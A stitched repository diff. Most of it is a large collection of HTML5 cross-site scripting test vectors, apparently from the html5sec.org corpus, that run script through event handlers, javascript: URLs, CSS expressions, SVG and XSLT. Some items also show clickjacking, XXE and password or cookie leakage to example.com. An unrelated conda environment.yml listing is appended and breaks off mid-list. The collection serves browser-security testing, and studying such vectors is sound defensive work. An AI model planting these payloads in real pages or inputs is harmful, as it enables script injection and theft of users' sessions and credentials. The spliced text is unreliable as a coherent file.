id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div> +<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div> +<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div> +<div id="39"><!-- up to Opera 11.52, FF 3.6.28 --> +<![><img src="]><img src=x onerror=alert(39)//"> +<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> +<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div> +<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div> +<div id="41"><li style=list-style:url() onerror=alert(41)></li> +<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div> +<div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div> +<div id="43"><?xml version="1.0" standalone="no"?> +<html xmlns="http://www.w3.org/1999/xhtml"> +<head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head> +<body>Hello</body> +</html>//["'`-->]]>]</div> +<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div> +<div id="53"><xml id="xss" src="test.htc"></xml> +<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div> +<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div> +<div id="61"><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div> +<div id="62"><!-- IE 6-8 --> +<x '="foo"><x foo='><img src=x onerror=alert(62)//'> +<!-- IE 6-9 --> +<! '="foo"><x foo='><img src=x onerror=alert(2)//'> +<? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div> +<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF +<img src="javascript:alert(2)"> +<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ +<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div> +<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div> +<div id="66"><?xml version="1.0"?> +<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> +<root/>//["'`-->]]>]</div> +<div id="67"><!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"onerror CDATA "alert(67)"onload CDATA "alert(2)">]><img />//["'`-->]]>]</div> +<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x></doc>//["'`-->]]>]</div> +<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div> +<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div> +<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div> +<div id="87"><svg xmlns="http://www.w3.org/2000/svg"> +<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a> +</svg>//["'`-->]]>]</div> +<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> +<animation xlink:href="javascript:alert(88)"/> +<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> +<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> +<foreignObject xlink:href="javascript:alert(88)"/> +<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/> +</svg>//["'`-->]]>]</div> +<div id="89"><svg xmlns="http://www.w3.org/2000/svg"> +<set attributeName="onmouseover" to="alert(89)"/> +<animate attributeName="onunload" to="alert(89)"/> +</svg>//["'`-->]]>]</div> +<div id="90"><!-- Up to Opera 10.63 --> +<div style=content:url(test2.svg)></div> +<!-- Up to Opera 11.64 - see link below --> +<!-- Up to Opera 12.x --> +<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div> +<div id="91">[A] +<? foo="><script>alert(91)</script>"> +<! foo="><script>alert(91)</script>"> +</ foo="><script>alert(91)</script>"> +<? foo="><x foo='?><script>alert(91)</script>'>"> +<! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>"> +<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div> +<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div> +<div id="94"><svg xmlns="http://www.w3.org/2000/svg"> +<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler> +</svg>//["'`-->]]>]</div> +<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> +<feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage> +</svg>//["'`-->]]>]</div> +<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> +<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div> +<div id="97"><!-- IE 5-9 --> +<div id=d><x xmlns="><iframe onload=alert(97)"></div> +<script>d.innerHTML+='';</script> +<!-- IE 10 in IE5-9 Standards mode --> +<div id=d><x xmlns='"><iframe onload=alert(2)//'></div> +<script>d.innerHTML+='';</script>//["'`-->]]>]</div> +<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> +<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div> +<div id="99">XXX<style> +*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ +<!-- +--><!--*{color:red} /* all UA */ +*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ +</style>//["'`-->]]>]</div> +<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div> +<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo"> +<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> +</svg>//["'`-->]]>]</div> +<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div> +<div id="108"><!-- IE 5-8 standards mode --> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"> +<!-- IE 5-9 standards mode --> +<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> +<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div> +<div id="109"><svg xmlns="http://www.w3.org/2000/svg"> +<a id="x"><rect fill="white" width="1000" height="1000"/></a> +<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> +</svg>//["'`-->]]>]</div> +<div id="110"><svg xmlns="http://www.w3.org/2000/svg"> +<path d="M0,0" style="marker-start:url(test4.svg#a)"/> +</svg>//["'`-->]]>]</div> +<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div> +<div id="113"><div id="x">XXX</div> +<style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>//["'`-->]]>]</div> +<div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div> +<div id="115"><!--[if]><script>alert(115)</script --> +<!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div> +<div id="116"><div id="x">x</div> +<xml:namespace prefix="t"> +<import namespace="t" implementation="#default#time2"> +<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div> +<div id="117"><a href="http://attacker.org"> +<iframe src="http://example.org/"></iframe> +</a>//["'`-->]]>]</div> +<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div> +<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div> +<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> +<textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div> +<div id="120"><script>function makePopups(){for (i=1;i<6;i++) {window.open('popup.html','spam'+i,'width=50,height=50');}}</script> +<body><a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div> +<div id="121"><html xmlns="http://www.w3.org/1999/xhtml" +xmlns:svg="http://www.w3.org/2000/svg"> +<body style="background:gray"> +<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> +<svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body> +</html>//["'`-->]]>]</div> +<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div> +<div id="123"><span class=foo>Some text</span> +<a class=bar href="http://www.example.org">www.example.org</a> +<script src="http://code.jquery.com/jquery-1.4.4.js"></script> +<script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>//["'`-->]]>]</div> +<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 +<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div> +<div id="125"><?xml version="1.0"?> +<?xml-stylesheet type="text/xml" href="#stylesheet"?> +<!DOCTYPE doc [ +<!ATTLIST xsl:stylesheet id ID #REQUIRED>]> +<svg xmlns="http://www.w3.org/2000/svg"> +<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe> </xsl:template></xsl:stylesheet><circle fill="red" r="40"></circle></svg>//["'`-->]]>]</div> +<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> +<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div> +<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x"> +<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> +<handler id="y">alert(127)</handler> +</svg>//["'`-->]]>]</div> +<div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div> +<div id="129"><svg> +<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'> +</svg>//["'`-->]]>]</div> +<div id="130"><math href="javascript:alert(130)">CLICKME</math> +<math> +<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> +<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> +</math>//["'`-->]]>]</div> +<div id="131"><b>drag and drop one of the following strings to the drop box:</b> +<br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b> +<br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div> +<div id="132"><!doctype html> +<form> +<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> +<br> +<input name="secret" type="password"> +</form> +<!-- injection --><svg height="50px"> +<image xmlns:xlink="http://www.w3.org/1999/xlink"> +<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> +<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> +<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> +<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> +</image> +</svg>//["'`-->]]>]</div> +<div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div> +<div id="134"><xmp> +<% +</xmp> +<img alt='%></xmp><img src=xx:x onerror=aler +*{color:red}</style>//["'`-->]]>]</div> +<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?> +<stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> +<template match="/"> +<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval> +<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> +</template> +</stylesheet>//["'`-->]]>]</div> +<div id="136"><form action="" method="post"> +<input name="username" value="admin" /> +<input name="password" type="password" value="secret" /> +<input name="injected" value="injected" dirname="password" /> +<input type="submit"> +</form>//["'`-->]]>]</div> +<div id="137"><svg> +<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> +<circle r="400"></circle> +<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" /> +</a>//["'`-->]]>]</div> +<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined +<marquee loop=1 width=0 onfinish=alert(1)> +<marguee/onstart=alert(1)> +<svg onload=(alert)(1)> +<script>$=1,alert($)</script> +<form><button formaction="javascript:alert(1)"> +<div style=xss:expression(alert(1))> +<div style=xss:expression(1)-alert(1)> +<div style=xss:expressio\6e(alert(1))> +<div style=xss:expressio\006e(alert(1))> +<div style=xss:expressio\00006e(alert(1))> +<div style=xss:expressio\6e(alert(1))> +<div style=xss:expressio&#x5c;6e(alert(1))> diff --git a/environment.yml b/environment.yml new file mode 100644 index 0000000..674c32f --- /dev/null +++ b/environment.yml @@ -0,0 +1,532 @@ +name: base +channels: + - defaults +dependencies: + - _anaconda_depends=2023.09=py311_mkl_1 + - _libgcc_mutex=0.1=main + - _openmp_mutex=5.1=1_gnu + - abseil-cpp=20211102.0=hd4dd3e8_0 + - aiobotocore=2.7.0=py311h06a4308_0 + - aiohttp=3.9.0=py311h5eee18b_0 + - aioitertools=0.7.1=pyhd3eb1b0_0 + - aiosignal=1.2.0=pyhd3eb1b0_0 + - alabaster=0.7.12=pyhd3eb1b0_0 + - anaconda-anon-usage=0.4.2=py311hfc0e8ea_0 + - anaconda-catalogs=0.2.0=py311h06a4308_0 + - anaconda-client=1.12.1=py311h06a4308_0 + - anaconda-cloud-auth=0.1.4=py311h06a4308_0 + - anaconda-navigator=2.5.0=py311h06a4308_0 + - anaconda-project=0.11.1=py311h06a4308_0 + - anyio=3.5.0=py311h06a4308_0 + - aom=3.6.0=h6a678d5_0 + - appdirs=1.4.4=pyhd3eb1b0_0 + - archspec=0.2.1=pyhd3eb1b0_0 + - argon2-cffi=21.3.0=pyhd3eb1b0_0 + - argon2-cffi-bindings=21.2.0=py311h5eee18b_0 + - arrow=1.2.3=py311h06a4308_1 + - arrow-cpp=11.0.0=h374c478_2 + - astroid=2.14.2=py311h06a4308_0 + - astropy=5.3.4=py311hf4808d0_0 + - asttokens=2.0.5=pyhd3eb1b0_0 + - async-lru=2.0.4=py311h06a4308_0 + - atomicwrites=1.4.0=py_0 + - attrs=23.1.0=py311h06a4308_0 + - automat=20.2.0=py_0 + - autopep8=1.6.0=pyhd3eb1b0_1 + - aws-c-common=0.6.8=h5eee18b_1 + - aws-c-event-stream=0.1.6=h6a678d5_6 + - aws-checksums=0.1.11=h5eee18b_2 + - aws-sdk-cpp=1.8.185=h721c034_1 + - babel=2.11.0=py311h06a4308_0 + - backports=1.1=pyhd3eb1b0_0 + - backports.functools_lru_cache=1.6.4=pyhd3eb1b0_0 + - backports.tempfile=1.0=pyhd3eb1b0_1 + - backports.weakref=1.0.post1=py_1 + - bcrypt=3.2.0=py311h5eee18b_1 + - beautifulsoup4=4.12.2=py311h06a4308_0 + - binaryornot=0.4.4=pyhd3eb1b0_1 + - black=23.11.0=py311h06a4308_0 + - blas=1.0=mkl + - bleach=4.1.0=pyhd3eb1b0_0 + - blosc=1.21.3=h6a678d5_0 + - bokeh=3.3.0=py311h92b7b1e_0 + - boltons=23.0.0=py311h06a4308_0 + - boost-cpp=1.82.0=hdb19cb5_2 + - botocore=1.31.64=py311h06a4308_0 + - bottleneck=1.3.5=py311hbed6279_0 + - brotli=1.0.9=h5eee18b_7 + - brotli-bin=1.0.9=h5eee18b_7 + - brotli-python=1.0.9=py311h6a678d5_7 + - brunsli=0.1=h2531618_0 + - bzip2=1.0.8=h7b6447c_0 + - c-ares=1.19.1=h5eee18b_0 + - c-blosc2=2.10.5=h80c7b02_0 + - ca-certificates=2023.12.12=h06a4308_0 + - certifi=2023.11.17=py311h06a4308_0 + - cffi=1.16.0=py311h5eee18b_0 + - cfitsio=3.470=h5893167_7 + - chardet=4.0.0=py311h06a4308_1003 + - charls=2.2.0=h2531618_0 + - charset-normalizer=2.0.4=pyhd3eb1b0_0 + - click=8.1.7=py311h06a4308_0 + - cloudpickle=2.2.1=py311h06a4308_0 + - clyent=1.2.2=py311h06a4308_1 + - colorama=0.4.6=py311h06a4308_0 + - colorcet=3.0.1=py311h06a4308_0 + - comm=0.1.2=py311h06a4308_0 + - conda=23.11.0=py311h06a4308_0 + - conda-build=3.28.3=py311h06a4308_0 + - conda-content-trust=0.2.0=py311h06a4308_0 + - conda-index=0.3.0=py311h06a4308_0 + - conda-libmamba-solver=23.12.0=pyhd3eb1b0_1 + - conda-pack=0.6.0=pyhd3eb1b0_0 + - conda-package-handling=2.2.0=py311h06a4308_0 + - conda-package-streaming=0.9.0=py311h06a4308_0 + - conda-repo-cli=1.0.75=py311h06a4308_0 + - conda-token=0.4.0=pyhd3eb1b0_0 + - conda-verify=3.4.2=py_1 + - constantly=23.10.4=py311h06a4308_0 + - contourpy=1.2.0=py311hdb19cb5_0 + - cookiecutter=2.5.0=py311h06a4308_0 + - cryptography=41.0.7=py311hdda0065_0 + - cssselect=1.1.0=pyhd3eb1b0_0 + - curl=8.5.0=hdbd6064_0 + - cycler=0.11.0=pyhd3eb1b0_0 + - cyrus-sasl=2.1.28=h52b45da_1 + - cytoolz=0.12.2=py311h5eee18b_0 + - daal4py=2023.1.1=py311h4cb112f_0 + - dal=2023.1.1=hdb19cb5_48680 + - dask=2023.11.0=py311h06a4308_0 + - dask-core=2023.11.0=py311h06a4308_0 + - datasets=2.12.0=py311h06a4308_0 + - datashader=0.16.0=py311h06a4308_0 + - dav1d=1.2.1=h5eee18b_0 + - dbus=1.13.18=hb2f20db_0 + - debugpy=1.6.7=py311h6a678d5_0 + - decorator=5.1.1=pyhd3eb1b0_0 + - defusedxml=0.7.1=pyhd3eb1b0_0 + - diff-match-patch=20200713=pyhd3eb1b0_0 + - dill=0.3.6=py311h06a4308_0 + - distributed=2023.11.0=py311h06a4308_0 + - distro=1.8.0=py311h06a4308_0 + - docstring-to-markdown=0.11=py311h06a4308_0 + - docutils=0.18.1=py311h06a4308_3 + - entrypoints=0.4=py311h06a4308_0 + - et_xmlfile=1.1.0=py311h06a4308_0 + - executing=0.8.3=pyhd3eb1b0_0 + - expat=2.5.0=h6a678d5_0 + - fastapi=0.103.0=py311h06a4308_0 + - filelock=3.13.1=py311h06a4308_0 + - flake8=6.0.0=py311h06a4308_0 + - flask=2.2.5=py311h06a4308_0 + - fmt=9.1.0=hdb19cb5_0 + - font-ttf-dejavu-sans-mono=2.37=hd3eb1b0_0 + - font-ttf-inconsolata=2.001=hcb22688_0 + - font-ttf-source-code-pro=2.030=hd3eb1b0_0 + - font-ttf-ubuntu=0.83=h8b1ccd4_0 + - fontconfig=2.14.1=h4c34cd2_2 + - fonts-anaconda=1=h8fa9717_0 + - fonttools=4.25.0=pyhd3eb1b0_0 + - freetype=2.12.1=h4a9f257_0 + - frozenlist=1.4.0=py311h5eee18b_0 + - fsspec=2023.10.0=py311h06a4308_0 + - future=0.18.3=py311h06a4308_0 + - gensim=4.3.0=py311hba01205_1 + - gflags=2.2.2=he6710b0_0 + - giflib=5.2.1=h5eee18b_3 + - glib=2.69.1=he621ea3_2 + - glog=0.5.0=h2531618_0 + - gmp=6.2.1=h295c915_3 + - gmpy2=2.1.2=py311hc9b5ff0_0 + - greenlet=3.0.1=py311h6a678d5_0 + - grpc-cpp=1.48.2=he1ff14a_1 + - gst-plugins-base=1.14.1=h6a678d5_1 + - gstreamer=1.14.1=h5eee18b_1 + - h11=0.12.0=pyhd3eb1b0_0 + - h2=4.0.0=py311h06a4308_3 + - h5py=3.9.0=py311hdd6beaf_0 + - hdf5=1.12.1=h2b7332f_3 + - heapdict=1.0.1=pyhd3eb1b0_0 + - holoviews=1.18.1=py311h06a4308_0 + - hpack=4.0.0=py_0 + - httpcore=0.15.0=py311h06a4308_0 + - httpx=0.23.0=py311h06a4308_0 + - huggingface_hub=0.17.3=py311h06a4308_0 + - hvplot=0.9.1=py311h06a4308_0 + - hyperframe=6.0.1=pyhd3eb1b0_0 + - hyperlink=21.0.0=pyhd3eb1b0_0 + - 